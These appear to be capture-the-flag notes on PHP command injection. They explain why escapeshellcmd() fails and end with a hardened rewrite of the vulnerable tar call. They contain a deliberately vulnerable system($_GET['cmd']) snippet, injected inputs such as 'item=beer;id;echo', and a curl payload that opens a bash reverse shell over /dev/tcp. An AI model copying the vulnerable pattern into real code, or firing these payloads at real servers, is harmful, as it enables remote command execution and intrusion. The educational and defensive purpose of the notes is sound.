
CommandInjection

command-injection-classic

command-injection-escapeshellcmd

```php
<?php
// Deliberately vulnerable: the cmd query parameter is passed straight to the shell
system($_GET['cmd']);
?>
```


```
http://vulnerable-server.com/files/converted?cmd=id
```

command-injection-saint_patrick

The code uses escapeshellcmd() to sanitize the output format parameter, but this is insufficient protection against command injection in this context.

The PHP function escapeshellcmd():

- Escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands
- Escapes these characters: `&#;`|*?~<>^()[]{}$\`, `\x0A` and `\xFF`
- Does not escape spaces

```php
escapeshellcmd('php;id'); // returns 'php\;id'
```

Request body:

```
POST item=beer;id;echo
```

Command executed on the server:

```sh
cd /tmp/uniqid123; tar -cf /tmp/timestamp_beer;id;echo.gz .
```

```sh
curl -X POST http://127.0.0.1:1337/ \
  -d "item=beer;bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1';echo"
```
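As an added example (not part of the original notes or the challenge code), the tar call from saint_patrick rewritten so that the item parameter can never reach a shell, illustrating why escapeshellcmd() is the wrong tool for the escapeshellcmd notes above. The working directory, the `item` parameter name and PHP 7.4 or newer (array form of proc_open) are assumptions.

```php
<?php
// Added example, not from the original notes. Assumes PHP >= 7.4 so that
// proc_open() accepts an argv array and bypasses the shell entirely.

function build_archive_command(string $workdir, string $item): array
{
    // 1. Allowlist first: a short alphanumeric name is all this endpoint needs.
    //    Escaping is only a fallback; validation is the primary control.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $item)) {
        throw new InvalidArgumentException('invalid item name');
    }
    $archive = '/tmp/' . time() . '_' . $item . '.gz';

    // 2. argv array: each element is exactly one argument to tar, so ';',
    //    '|', spaces and the rest are ordinary bytes, never shell syntax.
    return ['tar', '-cf', $archive, '-C', $workdir, '.'];
}

function run_archive(string $workdir, string $item): int
{
    $cmd  = build_archive_command($workdir, $item);
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    if ($status !== 0) {
        error_log("tar failed ($status): $stderr");
    }
    return $status;
}

// 3. If a shell string is unavoidable (older PHP), quote each argument with
//    escapeshellarg(): it wraps the value in single quotes so it stays one
//    argument. escapeshellcmd() leaves spaces alone, so an attacker-controlled
//    value can still add extra arguments to the command.
function legacy_shell_command(string $workdir, string $item): string
{
    return 'tar -cf ' . escapeshellarg("/tmp/{$item}.gz")
         . ' -C ' . escapeshellarg($workdir) . ' .';
}

// Constructed input: the payload from the notes is rejected outright.
try {
    build_archive_command('/tmp/uniqid123', 'beer;id;echo');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```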